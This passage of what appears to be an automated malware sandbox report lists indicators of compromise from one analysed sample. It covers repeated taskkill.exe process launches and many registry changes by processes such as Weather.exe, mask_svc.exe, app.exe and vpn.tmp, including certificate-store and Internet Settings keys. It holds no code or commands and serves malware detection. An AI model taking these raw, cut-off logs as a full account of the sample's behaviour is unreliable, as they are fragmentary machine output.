taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5840 taskkill.exe 4348 taskkill.exe 9876 taskkill.exe 8928 taskkill.exe 5508 taskkill.exe 1592 taskkill.exe 5416 taskkill.exe 2264 taskkill.exe 9472 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
Weather.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors Weather.exe -
Processes:
Weather.exebrowser_broker.exebrowser_broker.exetaskkill.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main taskkill.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
app.exemask_svc.exesvchost.exeDrvInst.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" app.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-162 = "Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2492 = "Aus Central W. Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
vpn.tmpMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeWeather.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exetaskkill.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe22.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface vpn.tmp Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0d6305c09e29d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" Weather.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Packa = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" Weather.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 248a89019f29d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 taskkill.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" Weather.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache Weather.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath Weather.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" Weather.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000121b9ecf8c15b3e104d26d2d6f98001a7251efa360025e9aa15bd130e70be91c1bc73cb47731a15d6a1ec54ce3a750b5ba56b8b5bc1ce2685b9a Weather.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings 22.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local 